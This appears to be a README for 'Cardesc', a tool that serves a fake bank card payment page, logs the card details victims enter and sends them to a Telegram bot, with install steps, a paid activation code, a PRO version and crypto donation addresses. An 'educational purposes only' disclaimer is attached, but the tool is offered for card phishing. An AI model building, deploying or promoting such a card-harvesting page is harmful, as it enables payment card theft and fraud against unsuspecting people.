cardesc copied to clipboard
Cardesc - is a universal bank card payment page with data logging
About :information_source:
Cardesc - is a universal bank card payment page with data logging :credit_card:
Main menu details :dart:
- [0] History Bank - your credit card history
- [1] Payment card page - bank card payment page for security purposes
- [1] -> [ports] - the port on which the program will work
- [2] Setting configuration - Configuration file settings
- [3] Helping - | activation token | other programs | PRO version
cardesc :zap:
apt update && apt upgrade
git clone
cd cardesc
pip3 install -r requirements.txt
Usage :man_technologist:
- ! Get an activation code in my telegram ! :old_key:
Result telegram bot :cactus:
- ! Sending results to Telegram bot API for the user CHAT_ID_USER
Ukraine :open_file_folder:
Все, що тут написано, написано виключно для освітніх і дослідницьких цілей, а також для розуміння механізмів захисту від злому. Сподіваємося, що ця програма допоможе вам краще організувати свою безпеку в Інтернеті, попереджений є озброєним. Автор @oldnum жодним чином не рекомендує використовувати цю інформацію для злому :/ Майте на увазі, ФБР стежить за вами :|
English :open_file_folder:
Everything written here is written solely for educational and research purposes, as well as to understand the mechanisms of protection against hacking. We hope that this program will help you to better organize your security on the Internet, forewarned is forearmed. The author of @oldnum does not in any way recommend using this information for hacking :/ Keep in mind, the FBI is watching you :|
Donation :moneybag:
btc: 3LXDKcrjVXxpGhWXEnVMnndJP45nos2LBS
eth: 0x7b6788a41F5379f49633a368FA902d47D318E4eC
ltc: ltc1qz8mpenks52p6ghkfwypj8k64x78yx5kt9gy6qg
payeer: P1061248421